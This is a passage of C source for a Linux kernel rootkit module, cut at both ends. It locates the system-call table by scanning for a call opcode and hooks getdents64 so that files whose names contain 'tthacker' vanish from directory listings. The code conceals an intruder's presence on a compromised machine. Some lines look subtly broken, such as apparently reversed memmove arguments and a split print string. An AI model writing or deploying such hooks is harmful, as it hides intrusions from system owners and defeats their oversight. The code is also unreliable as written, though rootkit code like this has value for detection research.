_getdents64)(unsigned int, void *, unsigned int);
struct descriptor_idt
{
unsigned short offset_low;
unsigned short ignore1;
unsigned short ignore2;
unsigned short offset_high;
};
static struct {
unsigned short limit;
unsigned long base;
}__attribute__ ((packed)) idt48;
char *hide="tthacker";
static unsigned int SYS_CALL_TABLE_ADDR;
void **sys_call_table;
int base_system_call;
unsigned char opcode_call[3]={0xff,0x14,0x85};
int match(unsigned char *source)
{
int i;
for(i=0;i<3;i++){
if(source[i] != opcode_call[i])
return 0;
}
return 1;
}
asmlinkage long hacked_getdents64(unsigned int fd, void *dirp, unsigned int count)
{
int ret;
int proc = 0;
struct inode *dinode;
char *ptr = (char *)dirp;
struct linux_dirent64 *curr;
struct linux_dirent64 *prev = NULL;
ret = (*orig_getdents64)(fd, dirp, count);
if(ret <= 0) return ret;
dinode = current->files->fd[fd]->f_dentry->d_inode;
/*
if(dinode->i_ino == PROC_ROOT_INO && MAJOR(dinode->i_dev) == proc_major_dev &&
MINOR(dinode->i_dev) == proc_minor_dev)
proc++;
*/
while(ptr < (char *)dirp + ret)
{
curr = (struct linux_dirent64 *)ptr;
if(strstr(curr->d_name,hide)!=NULL )
{
if(curr == dirp)
{
ret -= curr->d_reclen;
memmove(ptr + curr->d_reclen, ptr, ret);
continue;
}
else
prev->d_reclen += curr->d_reclen;
}
else
prev = curr;
ptr += curr->d_reclen;
}
return ret;
}
int get_sys_call_table(void)
{
int i,j;
unsigned char *ins=(unsigned char *)base_system_call;
unsigned int sct;
for(i=0;i<100;i++){
if(ins[i]==opcode_call[0]){
if(match(ins+i)){
sct=*((unsigned int *)(ins+3+i));
printk(KERN_ALERT "sys_call_tabl's address is
0x%X\n",sct);
return sct;
|